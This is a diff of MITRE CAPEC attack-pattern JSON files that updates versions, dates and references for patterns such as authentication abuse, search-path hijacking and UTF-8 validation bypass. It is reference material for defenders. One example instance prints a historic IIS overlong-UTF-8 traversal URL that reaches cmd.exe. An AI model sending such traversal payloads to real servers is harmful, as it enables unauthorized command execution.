"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--262aeb10-f03d-4f1c-947c-8229c12b5c02",
"id": "bundle--d9fe419d-403b-4e1e-875d-81086ee5d3a7",
"spec_version": "2.0",
"objects": [
{
@@ -30,7 +30,7 @@
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ecfb075a-b00d-4c88-be80-5f5d77279df5",
"id": "bundle--6ac87dd0-30cd-4bc1-8572-81a422873748",
"spec_version": "2.0",
"objects": [
{
@@ -67,7 +67,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2e017307-7bab-419b-972c-8dae9e089572.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ca5fbf51-b048-47a0-9ffe-18eef5dc66ae",
"id": "bundle--6f822cbb-f954-401b-b741-a015b636de69",
"spec_version": "2.0",
"objects": [
{
@@ -31,7 +31,7 @@
"This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--bb4c8361-4f0e-4783-b971-337fa6b1cdec",
"id": "bundle--61d9d162-3108-4196-a735-2b7063c8fcd1",
"spec_version": "2.0",
"objects": [
{
@@ -39,7 +39,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03.json
+8 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--1b05f109-4afe-4f2f-9901-5d9e3e5348d8",
"id": "bundle--5ed45acb-8287-4ab8-ac80-b66277767a17",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Authentication Abuse",
"description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.",
"external_references": [
@@ -21,6 +21,11 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/287.html",
"external_id": "CWE-287"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1244.html",
"external_id": "CWE-1244"
}
],
"object_marking_refs": [
@@ -35,7 +40,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4.json
+9 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--f4ba1706-7432-4690-87fa-cc6d020ede2e",
"id": "bundle--9db4ef98-3617-4c3b-95fe-f0860c71f98c",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Leveraging/Manipulating Configuration File Search Paths",
"description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.",
"external_references": [
@@ -27,6 +27,12 @@
"url": "http://cwe.mitre.org/data/definitions/427.html",
"external_id": "CWE-427"
},
{
"source_name": "ATTACK",
"description": "Hijack Execution Flow:Path Interception by PATH Environment Variable",
"url": "https://attack.mitre.org/wiki/Technique/T1574/007",
"external_id": "T1574.007"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
@@ -68,7 +74,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497.json
+6 -5
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--5d190fb5-88dc-4c0e-9bc3-2b27005fced9",
"id": "bundle--2b5c5e1f-9855-411e-b9b9-0053fca55172",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Using UTF-8 Encoding to Bypass Validation Logic",
"description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.",
"external_references": [
@@ -156,8 +156,9 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe</xhtml:div>\n <xhtml:p>the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.</xhtml:p>\n <xhtml:p>So when the attacker requested the tainted URL, he accessed</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">http://servername/scripts/../../winnt/system32/cmd.exe</xhtml:div>\n <xhtml:p>In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe.</xhtml:p>See also: CVE-2000-0884"
"\n <xhtml:p>Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe</xhtml:div>\n <xhtml:p>the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.</xhtml:p>\n <xhtml:p>So when the attacker requested the tainted URL, they accessed</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">http://servername/scripts/../../winnt/system32/cmd.exe</xhtml:div>\n <xhtml:p>In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.</xhtml:p>See also: CVE-2000-0884"
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for user-controllable inputs: </b>Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Probe entry points to locate vulnerabilities: </b>The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.",
@@ -165,11 +166,11 @@
],
"x_capec_skills_required": {
"Low": "An attacker can inject different representation of a filtered character in UTF-8 format.",
"Medium": "An attacker may craft subtle encoding of input data by using the knowledge that she has gathered about the target host."
"Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}

Some files were not shown because too many files have changed in this diff Show More